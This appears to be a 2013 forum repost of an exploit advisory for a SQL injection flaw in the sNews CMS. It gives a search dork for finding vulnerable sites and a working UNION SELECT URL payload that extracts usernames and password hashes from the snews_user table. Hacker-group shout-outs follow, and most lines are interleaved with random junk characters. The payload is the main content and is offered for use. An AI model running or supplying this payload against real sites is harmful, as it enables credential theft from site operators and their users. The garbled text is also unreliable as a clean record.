标题: CMS snews SQL Injection Vulnerability
9 d& U7 j. N, W+ i作者: By onestree
# [7 r' [0 [% L* J- _- J下载地址 : http://snewscms.com/
) O `, L! S3 d z) F( D) b测试平台 : ubuntu 12.10 / win 72 a. o# \7 m8 ]
关键词: inurl:"tanyakan pada rumput yang bergoyang"$ M% e5 {1 t5 k, p4 X
) o0 U( m' @7 o, W* z6 l" \* _; f2 v
) q" j. h) J" g# V6 [
*************************************************************' s+ y% p; U! V' o9 P! F5 q4 T
5 Z# P" U" k& y3 S4 q/ @SQL poc:1 @' F% F q( N8 N
/ z$ O$ n9 ]' R: b S! ~
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]* H9 H- f7 d; F
: a( Z: d9 u7 a1 @! g示例
1 h$ t- N2 M1 U1 _% d3 j2 Q + E- X( G6 ~5 X7 L8 M; z K
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
" Z7 v' p* w$ l0 n2 E! ~- [6 n( Q6 {* J
* O$ O8 z8 E: b2 B, t- S. S ; A W& r+ [3 g& j; w
致谢:% K+ r% y& v$ u3 h# V
) I5 F0 \/ a1 M" g0 h9 H+ J" n Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
& g1 h7 x% q5 M' z# }2 |8 K 9 Q+ R, L2 K1 j) L: N; L' c' Q
indonesiancoder - moeslimh4x0r - go-coder
3 k% W( \ J6 J' s( Y' O / s. p" O& l. U" x
spesial my hunny :*
6 \* B# i( f, q |
发表于 2013-1-23 08:55:06
收藏
支持
反对